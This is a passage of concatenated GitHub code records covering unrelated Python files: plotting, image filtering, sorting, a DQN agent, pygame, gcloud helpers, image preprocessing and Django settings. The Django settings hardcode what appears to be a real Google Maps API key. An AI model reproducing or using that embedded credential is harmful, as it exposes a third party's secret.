\\\"\")[1].split(\"\\\"\")[0]\n\t\t\tlr = line.split(\"\\\"lr\\\": \\\"\")[1].split(\"\\\"\")[0]\n\n\t\t\taccuracy_cls = float(accuracy_cls)\n\t\t\titeration = int(iteration)\n\t\t\tloss = float(loss)\n\t\t\tloss_bbox = float(loss_bbox)\n\t\t\tloss_mask = float(loss_mask)\n\t\t\ttime = float(time)\n\t\t\tlr = float(lr)\n\t\t\tprint((accuracy_cls),iteration,loss,loss_bbox,loss_mask,time,lr)\n\t\t\t\n\t\t\tall_accuracy_cls.append(accuracy_cls)\n\t\t\titers.append(iteration)\n\t\t\tall_loss.append(loss)\n\t\t\tall_loss_bbox.append(loss_bbox)\n\t\t\tall_loss_mask.append(loss_mask)\n\t\t\tall_time.append(time)\n\t\t\tall_lr.append(lr)\n\n\tfig = plt.figure(figsize=(8,6))\n\tax2 = fig.add_subplot(111)\n\tax1 = ax2.twinx()\n\n\n\tax1.plot(iters, all_loss, color='red', label='loss')\n\tax1.plot(iters, all_loss_bbox, color='purple', label='loss_bbox')\n\tax1.plot(iters, all_loss_mask, color='blue', label='loss_mask')\n\tax1.plot(iters, all_accuracy_cls, color='orange', label='accuracy_cls')\n\tax1.plot(iters, all_time, color='olive', label='time/20iters')\n\t#设置坐标轴范围\n\tax1.set_xlim((0,iters[-1]))\n\tax1.set_ylim((0,1))\n\n\t# 设置坐标轴、图片名称\n\tax1.set_xlabel('iters')\n\tlog_name = log_file.split('.log')[0].split('/')[-1]\n\tax1.set_title(log_name + ': ' +backbone)\n\n\t\n\tax2.plot(iters, all_lr, color='black', label='lr')\n\n\tax2.set_ylim([0, max(all_lr)*1.1])\n\tax1.legend(loc='upper right')\n\tax2.legend(loc='center right')\n\n\n\tax1.set_ylabel('loss and accuracy')\n\tax2.set_ylabel('learning rate')\n\n\tplt.savefig('./log/'+ log_name + '.png')\n\tplt.show()\n","repo_name":"pascal1129/kaggle_airbus_ship_detection","sub_path":"2_model/analyse_log.py","file_name":"analyse_log.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":259,"dataset":"github-code","pt":"7"} +{"seq_id":"23725495161","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 16 01:22:46 2019\r\n\r\n@author: Aditya Chondke\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport cv2\r\nfrom numba import jit,double\r\nimport time\r\n\r\n\r\ndef gaussian(image,fil):\r\n image_out = np.array(image.copy())\r\n\r\n (h,w) = image.shape\r\n (hf,wf)=fil.shape\r\n hf2=hf//2\r\n wf2=wf//2\r\n \r\n for i in range(hf2, h-hf2):\r\n for j in range(wf2, w-wf2):\r\n tsum=0\r\n for ii in range(hf):\r\n for jj in range(wf):\r\n tsum=tsum+(image[i-hf2+ii,j-wf2+jj]*fil[hf-1-ii,wf-1-jj])\r\n \r\n image_out[i][j]=tsum\r\n \r\n return image_out\r\n\r\n\r\n\r\nimage =np.array(cv2.imread('Input Image path',cv2.IMREAD_GRAYSCALE))\r\ngauss2=np.array([[1/16,1/8,1/16],[1/8,1/4,1/8],[1/16,1/8,1/16]])\r\n\r\ngaussian_fast = jit(double[:,:](double[:,:], double[:,:]))(gaussian)\r\n\r\nstart=time.time()\r\nimage_out=gaussian_fast(image,gauss2)\r\nend=time.time() \r\n \r\nprint(end-start) \r\ncv2.imwrite('Output image path' , image_out)\r\n\r\n\r\n","repo_name":"AdityaChondke/CannyEdgeDectector","sub_path":"Gaussian_parallel_code.py","file_name":"Gaussian_parallel_code.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"39795439439","text":"def merge_sort(L):\n '''使用 '递归(recursive)' 的方式,实现归并排序算法\n 自顶向下(Top Down):\n 1. 递归 '拆分(Splitting)' 成左右两个子序列,首先递归 left = merge_sort(L[:mid])\n 不断递归左边,当某一层递归中,左子序列只有一个元素时,向上返回上一层调用,即 left 获取到返回值;\n 然后,在上一层调用中,递归 right = merge_sort(L[mid:])\n 当右子序列只有一个元素时,向上返回,right 获取到返回值\n 2. 当 left 和 right 都被赋值为单个元素的子序列后,再执行 '归并(Merging)' 操作,返回排好序的序列给上一层函数\n 即上一层函数的 left 或 right 被赋值为递归函数的返回值\n\n 不懂的,看我的博客图解: http://www.madmalls.com/blog/post/merge-sort-algorithm/\n '''\n n = len(L)\n # 两个作用:\n # 1. 客户端传入原始序列只有一个元素或为空时,不用排序,直接返回\n # 2. 递归的退出条件。如果传入的序列元素个数为1时,不再拆分,返回\n if n <= 1:\n return L\n\n # 将传入的序列拆分成左右两个子序列,再分别递归\n mid = n // 2\n left = merge_sort(L[:mid]) # 特别注意:先递归左边的,直到子序列元素为1个,才依次向上返回。比如L = [54, 26, 93, 17, 77, 31, 44, 55, 20],则会先将 [54, 26, 93, 17] 归并排序好之后才会排右边的\n right = merge_sort(L[mid:])\n\n # 开始��行归并操作,将结果返回给上一层的 merge_sort() 调用栈\n return merge(left, right)\n\n\ndef merge(left, right):\n '''归并操作,使用可移动游标'''\n left_index = 0 # left序列的可移动的下标\n right_index = 0 # right序列的可移动的下标\n merged = [] # 用来存放最终排好序的元素\n\n while left_index < len(left) and right_index < len(right): # 一旦 left序列 或 right序列 中的元素比较完成,就退出循环\n if left[left_index] < right[right_index]:\n merged.append(left[left_index])\n left_index += 1 # left序列的下标向右移动一位\n else:\n merged.append(right[right_index])\n right_index += 1 # right序列的下标向右移动一位\n\n merged = merged + left[left_index:] # 如果 left序列 还有没比较的元素\n merged = merged + right[right_index:] # 如果 right序列 还有没比较的元素\n return merged\n\n\ndef is_sorted(L):\n '''辅助函数: 用来判断 '归并排序函数(merge_sort)' 的输出结果是否是正确的升序序列'''\n prev = L[0]\n for i in range(1, len(L)):\n if prev > L[i]:\n print('Sort ascending failed.')\n return False\n prev = L[i]\n print('Sort ascending succeed.')\n return True\n\n\nif __name__ == '__main__':\n L1 = [54, 26, 93, 17, 77, 31, 44, 55, 20]\n print('Before: ', L1)\n merged = merge_sort(L1)\n if is_sorted(merged):\n print('After: ', merged)\n\n # Output:\n # Before: [54, 26, 93, 17, 77, 31, 44, 55, 20]\n # Sort ascending succeed.\n # After: [17, 20, 26, 31, 44, 54, 55, 77, 93]\n\n '''\n 压力测试,timeit.timeit() 如果from __main__ import L,结果好像不对,所以在函数内初始化相同的L:\n\n from timeit import timeit\n\n def test():\n # import random\n # gen = (random.randint(1, 100) for i in range(100)) # 产生100个 1-99 范围内的随机整数\n # L = list(gen)\n L = [96, 2, 65, 23, 47, 58, 8, 48, 69, 92, 34, 83, 93, 47, 45, 55, 95, 15, 92, 24, 64, 19, 29, 55, 35, 48, 39, 29, 63, 94, 99, 38, 50, 10, 10, 93, 74, 27, 74, 44, 29, 81, 85, 86, 74, 30, 50, 50, 12, 12, 38, 75, 41, 87, 80, 97, 16, 48, 65, 69, 83, 71, 28, 9, 64, 69, 27, 74, 74, 86, 40, 69, 79, 79, 77, 100, 53, 72, 77, 16, 8, 36, 41, 58, 59, 29, 46, 79, 81, 66, 8, 35, 60, 52, 2, 82, 2, 36, 79, 66]\n merge_sort(L)\n\n def merge_sort(L):\n n = len(L)\n if n <= 1:\n return L\n\n mid = n // 2\n left = merge_sort(L[:mid])\n right = merge_sort(L[mid:])\n\n return merge(left, right)\n\n def merge(left, right):\n merged, left_index, right_index = [], 0, 0\n while left_index < len(left) and right_index < len(right):\n if left[left_index] < right[right_index]:\n merged.append(left[left_index])\n left_index += 1\n else:\n merged.append(right[right_index])\n right_index += 1\n return merged + left[left_index:] + right[right_index:]\n\n\n print('Merge sort function run 1000 times, cost: ', timeit('test()', 'from __main__ import test', number=1000), 'seconds.')\n\n\n # Output:\n # Merge sort function run 1000 times, cost: 0.5221137649991934 seconds.\n '''\n","repo_name":"wangy8961/python3-algorithms","sub_path":"4. 排序算法 - Sorting/5. 归并排序 - Merge Sort/1_recursive_merge_sort_asc.py","file_name":"1_recursive_merge_sort_asc.py","file_ext":"py","file_size_in_byte":4817,"program_lang":"python","lang":"zh","doc_type":"code","stars":82,"dataset":"github-code","pt":"7"} +{"seq_id":"20120819787","text":"import copy\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom network import AtariModel\nfrom torch.optim import Adam\n\nfrom rltoolkit.models.utils import hard_target_update\nfrom rltoolkit.utils.scheduler import LinearDecayScheduler\n\n\nclass Agent(object):\n \"\"\"Agent.\n\n Args:\n algo (`Algorithm`): algorithm to be used in this agent.\n action_dim (int): action space dimension\n total_step (int): total epsilon decay steps\n learning_rate (float): initial learning rate\n update_target_step (int): target network update frequency\n \"\"\"\n\n def __init__(self,\n action_dim: int,\n algo: str = 'dqn',\n gamma: float = 0.99,\n epsilon: float = 1.0,\n learning_rate: float = 0.001,\n total_step: int = 1000000,\n update_target_step: int = 100,\n device='cpu'):\n super().__init__()\n\n self.algo = algo\n self.gamma = gamma\n self.epsilon = epsilon\n self.lr_end = 0.00001\n self.global_update_step = 0\n self.update_target_step = update_target_step\n self.action_dim = action_dim\n\n # Main network\n if algo in ['dqn', 'ddqn']:\n self.qnet = AtariModel(\n act_dim=action_dim, dueling=False).to(device)\n elif algo in ['duling_dqn', 'duling_ddqn']:\n self.qnet = AtariModel(act_dim=action_dim, dueling=True).to(device)\n\n # Target network\n self.target_qnet = copy.deepcopy(self.qnet)\n # Create an optimizer\n self.optimizer = Adam(self.qnet.parameters(), lr=learning_rate)\n self.lr_scheduler = LinearDecayScheduler(learning_rate, total_step)\n\n self.device = device\n\n def sample(self, obs) -> int:\n \"\"\"Sample an action when given an observation, base on the current\n epsilon value, either a greedy action or a random action will be\n returned.\n\n Args:\n obs: current observation\n\n Returns:\n act (int): action\n \"\"\"\n # Choose a random action with probability epsilon\n if np.random.rand() <= self.epsilon:\n act = np.random.randint(self.action_dim)\n else:\n # Choose the action with highest Q-value at the current state\n act = self.predict(obs)\n\n return act\n\n def predict(self, obs) -> int:\n \"\"\"Predict an action when given an observation, a greedy action will be\n returned.\n\n Args:\n obs (np.float32): shape of (3, 84, 84) or (1, 3, 84, 84), current observation\n\n Returns:\n act(int): action\n \"\"\"\n if obs.ndim == 3: # if obs is 3 dimensional, we need to expand it to have batch_size = 1\n obs = np.expand_dims(obs, axis=0)\n obs = torch.tensor(obs, dtype=torch.float, device=self.device)\n pred_q = self.qnet(obs).cpu().detach().numpy().squeeze()\n best_actions = np.where(pred_q == pred_q.max())[0]\n select_action = np.random.choice(best_actions)\n return select_action\n\n def learn(self, obs: torch.Tensor, action: torch.Tensor,\n reward: torch.Tensor, next_obs: torch.Tensor,\n terminal: torch.Tensor) -> float:\n \"\"\"Update model with an episode data.\n\n Args:\n obs (np.float32): shape of (batch_size, obs_dim)\n act (np.int32): shape of (batch_size)\n reward (np.float32): shape of (batch_size)\n next_obs (np.float32): shape of (batch_size, obs_dim)\n terminal (np.float32): shape of (batch_size)\n\n Returns:\n loss (float)\n \"\"\"\n if self.global_update_step % self.update_target_step == 0:\n hard_target_update(self.qnet, self.target_qnet)\n\n reward = np.clip(reward, -1, 1)\n\n action = action.to(self.device, dtype=torch.long)\n action = action.to(self.device, dtype=torch.long)\n\n # Prediction Q(s)\n pred_value = self.qnet(obs).gather(1, action)\n\n # Target for Q regression\n if self.algo in ['dqn', 'duling_dqn']:\n next_q_value = self.target_qnet(next_obs).max(1, keepdim=True)[0]\n\n elif self.algo in ['ddqn', 'duling_ddqn']:\n greedy_action = self.qnet(next_obs).max(dim=1, keepdim=True)[1]\n next_q_value = self.target_qnet(next_obs).gather(1, greedy_action)\n\n target = reward + (1 - terminal) * self.gamma * next_q_value\n\n # TD误差目标\n loss = F.mse_loss(pred_value, target)\n # PyTorch中默认梯度会累积,这里需要显式将梯度置为0\n self.optimizer.zero_grad()\n loss.backward()\n # 反向传播更新参数\n self.optimizer.step()\n\n # learning rate decay\n for param_group in self.optimizer.param_groups:\n param_group['lr'] = max(self.lr_scheduler.step(1), self.lr_end)\n\n self.global_update_step += 1\n return loss.item()\n","repo_name":"jianzhnie/deep-rl-toolkit","sub_path":"examples/tutorials/DQN-Atari/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"7"} +{"seq_id":"2427215673","text":"from os.path import exists, join\nfrom pathlib import Path\n\nCURRENT_DIR = Path(__file__).parent.resolve()\n\nCERT_PATH = (CURRENT_DIR / \"keys\" / \"cert.pem\")\nKEY_PATH = (CURRENT_DIR / \"keys\" / \"key.pem\")\nINDEX_PATH = (CURRENT_DIR / \"page\" / \"index.html\")\n\ndef main():\n if not exists(CERT_PATH):\n print(\"ERROR: Cert not found, reinstall the pychame to fix it\")\n print(f\"Cert Path: {CERT_PATH}\")\n exit(0)\n\n if not exists(KEY_PATH):\n print(\"ERROR: Key not found, reinstall the pychame to fix it\")\n print(f\"Key Path: {KEY_PATH}\")\n exit(0)\n \n if not exists(INDEX_PATH):\n print(\"ERROR: Index HTML not found, reinstall the pychame to fix it\")\n print(f\"Index HTML Path: {INDEX_PATH}\")\n exit(0)","repo_name":"LucasOliveiraaa/Pychame","sub_path":"src/pychame/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"24395977757","text":"import pygame\nimport sys\nimport menu\nfrom configuracion import *\n\nclass main: #Objeto Principal.\n def __init__(self,width,height):\n pygame.init()\n pygame.mixer.music.load('sound/music.wav') # Carga la musica de la pantalla inicial.\n pygame.mixer.music.play(-1) #Reproduce la musica infinitas veces.\n pygame.display.set_caption(\"Sí-la-bas...\") #Titulo de la ventana.\n self.width = width\n self.height = height\n self.clock = pygame.time.Clock()\n self.screen = pygame.display.set_mode((width, height))\n self.BackGround = pygame.image.load(\"image/inicio/background.jpg\") # Carga imagen de fondo de la pantalla inicial.\n self.BackGround = pygame.transform.scale(self.BackGround, (width, height))\n self.Github = pygame.image.load(\"image/inicio/github.png\") # Carga imagen de GITHUB\n self.Github = pygame.transform.scale(self.Github, (width, height))\n self.menu = menu.menu(self.width, self.height) #Instancia al objeto MENU.\n self.bg_letras = pygame.image.load(\"image/inicio/bg-letras1.png\") # Carga imagen de las letras en la pantalla de inicio.\n self.bg_letras = pygame.transform.scale(self.bg_letras, (width, height))\n self.pos = 0\n\n def draw(self):\n if not (pygame.display.get_init()):\n run = main(self.menu.width,self.menu.height)\n run.run()\n\n self.screen.fill((30, 30, 30))\n self.screen.blit(self.BackGround, (0, 0))\n self.screen.blit(self.bg_letras,(0,self.pos))\n self.screen.blit(self.bg_letras,(0,self.pos - self.height))\n self.screen.blit(self.Github, (0, 0))\n self.menu.draw(self.screen)\n pygame.display.flip()\n\n def handleInput(self):\n input = pygame.event.get()\n for event in input:\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n self.menu.handelInput(input,self.screen)\n\n def run(self):\n while True:\n\n self.clock.tick(60)\n self.handleInput()\n self.draw()\n if self.pos >= self.height:\n self.pos = 0\n self.pos += 1\n\n\nrun = main(Width, Height)\nrun.run()","repo_name":"jooherrera/juegoSilabas","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"27763938369","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\n\ndef GetCertRefFromName(sql_client, sql_messages, resources, instance_ref,\n common_name):\n \"\"\"Get a cert reference for a particular instance, given its common name.\n\n Args:\n sql_client: apitools.BaseApiClient, A working client for the sql version to\n be used.\n sql_messages: module, The module that defines the messages for the sql\n version to be used.\n resources: resources.Registry, The registry that can create resource refs\n for the sql version to be used.\n instance_ref: resources.Resource, The instance whos ssl cert is being\n fetched.\n common_name: str, The common name of the ssl cert to be fetched.\n\n Returns:\n resources.Resource, A ref for the ssl cert being fetched. Or None if it\n could not be found.\n \"\"\"\n cert = GetCertFromName(sql_client, sql_messages, instance_ref, common_name)\n\n if not cert:\n return None\n\n return resources.Create(\n collection='sql.sslCerts',\n project=instance_ref.project,\n instance=instance_ref.instance,\n sha1Fingerprint=cert.sha1Fingerprint)\n\n\ndef GetCertFromName(sql_client, sql_messages, instance_ref, common_name):\n \"\"\"Get a cert for a particular instance, given its common name.\n\n In the SQL API, the last parameter of the URL is the sha1fingerprint, which is\n not something writeable or readable by humans. Instead, the CLI will ask for\n the common name. To allow this, we first query all the ssl certs for the\n instance, and iterate through them to find the one with the correct common\n name.\n\n Args:\n sql_client: apitools.BaseApiClient, A working client for the sql version to\n be used.\n sql_messages: module, The module that defines the messages for the sql\n version to be used.\n instance_ref: resources.Resource, The instance whos ssl cert is being\n fetched.\n common_name: str, The common name of the ssl cert to be fetched.\n\n Returns:\n resources.Resource, A ref for the ssl cert being fetched. Or None if it\n could not be found.\n \"\"\"\n certs = sql_client.sslCerts.List(\n sql_messages.SqlSslCertsListRequest(\n project=instance_ref.project, instance=instance_ref.instance))\n for cert in certs.items:\n if cert.commonName == common_name:\n return cert\n\n return None\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/api_lib/sql/cert.py","file_name":"cert.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"16057693210","text":"# coding=utf-8\nimport os\nfrom cuzquena.util import get_env\n\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nENV = get_env(BASE_DIR)\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\n\nEMAIL_HOST = ENV.get('EMAIL_HOST', 'bbdd')\nEMAIL_HOST_USER = ENV.get('EMAIL_HOST_USER', 'bbdd')\nEMAIL_HOST_PASSWORD = ENV.get('EMAIL_HOST_PASSWORD', 'bbdd')\nDEFAULT_FROM_EMAIL = ENV.get('DEFAULT_FROM_EMAIL', 'bbdd')\nSERVER_EMAIL = ENV.get('SERVER_EMAIL', 'bbdd')\nEMAIL_PORT = 587\nEMAIL_USE_TLS = True\n\n\nSECRET_KEY = ENV.get('SECRET_KEY', 'bbdd')\nURL_SITE = ENV.get('URL_SITE', 'bbdd')\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = ()\n\n\nDJANGO_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n]\n\nTHIRD_PARTY_APPS = [\n \"geoposition\",\n 'admin_reorder',\n 'django_summernote',\n 'easy_thumbnails',\n 'filebrowser',\n]\n\n\nLOCAL_APPS = [\n \"my_apps.web\",\n \"my_apps.seo\"\n]\n\nINSTALLED_APPS = THIRD_PARTY_APPS + DJANGO_APPS + LOCAL_APPS\nROOT_URLCONF = 'cuzquena.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [os.path.join(BASE_DIR, 'templates')],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n \"django.template.context_processors.static\",\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'my_apps.web.processors.processors_site'\n ],\n },\n },\n]\n\nMIDDLEWARE_CLASSES = [\n 'admin_reorder.middleware.ModelAdminReorder',\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\n\nWSGI_APPLICATION = 'cuzquena.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.9/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': ENV.get('DB_NAME', 'bbdd'),\n 'USER': ENV.get('DB_USER'),\n 'PASSWORD': ENV.get('DB_PASSWORD'),\n 'HOST': 'localhost',\n 'PORT': '',\n 'CONN_MAX_AGE': None,\n }\n}\n\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\nLANGUAGE_CODE = 'es-pe'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n# LOGIN_URL = \"/\"\nGEOPOSITION_GOOGLE_MAPS_API_KEY = 'AIzaSyAxYmorvw6JL6mAaUZKo3xxIdXyjzzfvF4'\n\nADMIN_REORDER = (\n # Keep original label and models\n # 'sites',\n\n # Rename app\n {'app': 'auth', 'label': u'AUTENTICACIÓN Y AUTORIZACIÓN'},\n {'app': 'web', 'label': u'Configuracion', 'models': (\n {'model': 'web.Configuracion', 'label': 'Configuracion del Sitio'},\n\n )},\n {'app': 'web', 'label': u'Home', 'models': (\n {'model': 'web.HomeBanner', 'label': 'Banner'},\n {'model': 'web.Home', 'label': 'Contenido'},\n )},\n {'app': 'web', 'label': u'Nosotros', 'models': (\n {'model': 'web.Nosotros', 'label': u'Nosotros'},\n {'model': 'web.Valores', 'label': u'Valores'},\n\n )},\n {'app': 'web', 'label': u'Servicios', 'models': (\n {'model': 'web.Servicios', 'label': u'Servicios Banner'},\n {'model': 'web.NuestrosServicios', 'label': u'Nuestros Servicios'},\n\n )},\n {'app': 'web', 'label': u'Vehiculos', 'models': (\n {'model': 'web.VehiculoBanner', 'label': u'Banner'},\n {'model': 'web.Vehiculos', 'label': u'Vehiculos'},\n\n\n )},\n {'app': 'web', 'label': u'Contacto', 'models': (\n {'model': 'web.ContactoBanner', 'label': u'Banner'},\n\n\n )},\n {'app': 'web', 'label': u'Formularios', 'models': (\n {'model': 'web.Contacto', 'label': u'Contacto'},\n {'model': 'web.MovilizarEmpresa', 'label': u'Movilizar a tu Empresa'},\n\n )},\n {'app': 'seo', 'label': u'SEO', 'models': (\n {'model': 'web.SEO', 'label': u'SEO'},\n\n\n )},\n # Reorder app models\n\n # models with custom name\n\n)\nFILEBROWSER_MAX_UPLOAD_SIZE = 26214400 # 25 MB\nFILEBROWSER_NORMALIZE_FILENAME = True\nFILEBROWSER_OVERWRITE_EXISTING = False\nFILEBROWSER_LIST_PER_PAGE = 25\n\nFILEBROWSER_SHOW_PLACEHOLDER = True\nFILEBROWSER_PLACEHOLDER = 'no-disponible/no-disponible.png'\nFILEBROWSER_EXTENSIONS = {\n 'Folder': [''],\n 'Image': ['.jpg', '.jpeg', '.gif', '.png', '.tif', '.tiff'],\n 'Document': ['.pdf', '.doc', '.rtf', '.txt', '.xls', '.csv', '.swf'],\n 'Video': ['.mov', '.wmv', '.mpeg', '.mpg', '.avi'],\n 'Audio': ['.mp3', '.mp4', '.wav', '.aiff', '.midi', '.m4p']\n}\n\nFILEBROWSER_SELECT_FORMATS = {\n 'file': ['Folder', 'Image', 'Document', 'Video', 'Audio'],\n 'image': ['Image'],\n 'document': ['Document'],\n 'media': ['Video', 'Audio'],\n}\nFILEBROWSER_SHOW_IN_DASHBOARD = False\n","repo_name":"danielhuamani/django-la-cuzquena","sub_path":"cuzquena/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7234205378","text":"class Solution:\n def networkDelayTime(self, times: List[List[int]], n: int, k: int) -> int:\n edges = {}\n for t in times:\n if t[0] in edges:\n edges[t[0]][t[1]]=t[2]\n else:\n edges[t[0]] ={t[1]:t[2]}\n\n heap = []\n heappush(heap,(0,k))\n visited = set()\n while heap:\n cr = heappop(heap)\n if cr[1] in visited:\n continue\n visited.add(cr[1])\n if cr[1] in edges:\n for e in edges[cr[1]]:\n if e not in visited:\n heappush(heap,(cr[0]+edges[cr[1]][e],e))\n edges.pop(cr[1])\n ans = cr[0]\n \n return ans if len(visited) == n else -1\n ","repo_name":"gadisamenu/competitive-programming","sub_path":"743-network-delay-time/743-network-delay-time.py","file_name":"743-network-delay-time.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35112192474","text":"# -*- coding: utf-8 -*-\n\nimport cv2\nimport numpy as np\n\nclass PreProcess(object):\n \n def ConvertToGray(Image):\n GrayImage = cv2.cvtColor(Image,cv2.COLOR_BGR2GRAY)\n return GrayImage\n \n \n def ConvertToBpp(GrayImage):\n App,Bpp = cv2.threshold(GrayImage,130,255,cv2.THRESH_BINARY)\n return Bpp\n\n \n def ConvertToSalt(Bpp,n):\n for k in range(n):\n i = int(np.random.random() * Bpp.shape[1])\n j = int(np.random.random() * Bpp.shape[0])\n if Bpp.ndim == 2:\n Bpp[j,i] = 255\n elif Bpp.ndim == 3:\n Bpp[j,i,0] = 255\n Bpp[j,i,1] = 255\n Bpp[j,i,2] = 255\n return Bpp\n \n \n def ConvertToDilate(Bpp):\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(1, 1))\n Bpp = cv2.blur(Bpp, (1,1)) \n Bpp = cv2.medianBlur(Bpp,5) \n# Bpp = PP.ConvertToSalt(Bpp,1000) \n Bpp = cv2.dilate(Bpp,kernel)\n Bpp = cv2.erode(Bpp,kernel) \n return Bpp\n \n def InterferLine(Bpp):\n for i in range(56):\n for j in range(Bpp.shape[0]):\n Bpp[j][i] = 255 \n for j in range(171,Bpp.shape[1]):\n for i in range(Bpp.shape[0]):\n Bpp[i][j] = 255\n m = 1\n n = 1 \n for i in range(50, 171):\n while (m < Bpp.shape[0]-1):\n if Bpp[m][i] == 0:\n if Bpp[m+1][i] == 0:\n n = m+1\n elif m>0 and Bpp[m-1][i] == 0:\n n = m\n m = n-1\n else:\n n = m+1\n break\n elif m != Bpp.shape[0]:\n l = 0\n k = 0\n ll = m\n kk = m\n while(ll>0):\n if Bpp[ll][i] == 0:\n ll = ll-1\n l = l+1\n else:\n break\n while(kk>0):\n if Bpp[kk][i] == 0:\n kk = kk-1\n k = k+1\n else:\n break\n if (l <= k and l != 0) or (k == 0 and l != 0):\n m = m-1\n else:\n m = m+1\n else:\n break\n if m>0 and Bpp[m-1][i] == 0 and Bpp[n-1][i] == 0:\n continue \n# else:\n# Bpp[m][i] = 255\n# Bpp[n][i] = 255\n return Bpp\n \n def InterferPoint(Bpp):\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT,(3, 3))\n Bpp = cv2.dilate(Bpp,kernel)\n# Bpp = cv2.erode(Bpp,kernel)\n return Bpp\n \n \n def CutImage(Bpp):\n TotalBlack = 0\n for j in range(56,170):\n for i in range(50):\n if Bpp[i][j] == 0:\n TotalBlack += 1\n if TotalBlack < 8:\n cv2.line(Bpp,(j,0),(j,50),(120,120,120),1)\n TotalBlack =0\n return Bpp\n \n \nif __name__ == '__main__':\n inpath = 'E:/pest1/nacao/18.png'\n img = cv2.imread(inpath)\n PP = PreProcess\n GrayImage = PP.ConvertToGray(img)\n Bpp = PP.ConvertToBpp(GrayImage)\n Bpp = PP.InterferLine(Bpp) \n Bpp = PP.ConvertToDilate(Bpp) \n Bpp = PP.InterferPoint(Bpp)\n# Bpp = PP.CutImage(Bpp)\n# cv2.imshow('img',Bpp)\n cv2.imwrite('118.png',Bpp)\n# cv2.imwrite('img',img)\n# cv2.waitKey(0)\n \n","repo_name":"nanqianbeiquan/keras","sub_path":"preprocessing/PreProcess.py","file_name":"PreProcess.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"5928772591","text":"from .communication import get_value, set_value\n\n\nclass EigerStreamInterface(object):\n \n def __init__(self, host, port=80, api_version=\"1.5.0\"):\n super(EigerStreamInterface, self).__init__()\n self._host = host\n self._port = port\n self._api_v = api_version\n \n def get_enabled(self, timeout=2.0):\n en = get_value(self._host, self._port, self._api_v, \"stream\",\n \"config\", \"mode\", timeout=timeout,\n return_full=False)\n return en == \"enabled\"\n \n def set_enabled(self, enabled, timeout=2.0):\n en = \"enabled\" if enabled else \"disabled\"\n set_value(self._host, self._port, self._api_v, \"stream\",\n \"config\", \"mode\", en, timeout=timeout,\n no_data=True)\n \n enabled = property(get_enabled, set_enabled)\n \n","repo_name":"kuntaro0524/eiger","sub_path":"dectris_eiger/stream.py","file_name":"stream.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"38965176470","text":"# -*- coding: utf-8 -*-\nimport logging\nimport multiprocessing\nfrom datetime import datetime\nfrom raccoon_simple_stopwatch.stopwatch import StopWatch\n\nfrom simple_log_factory.log_factory import log_factory\nfrom client.sensor_client import SensorClient\n\n\ndef 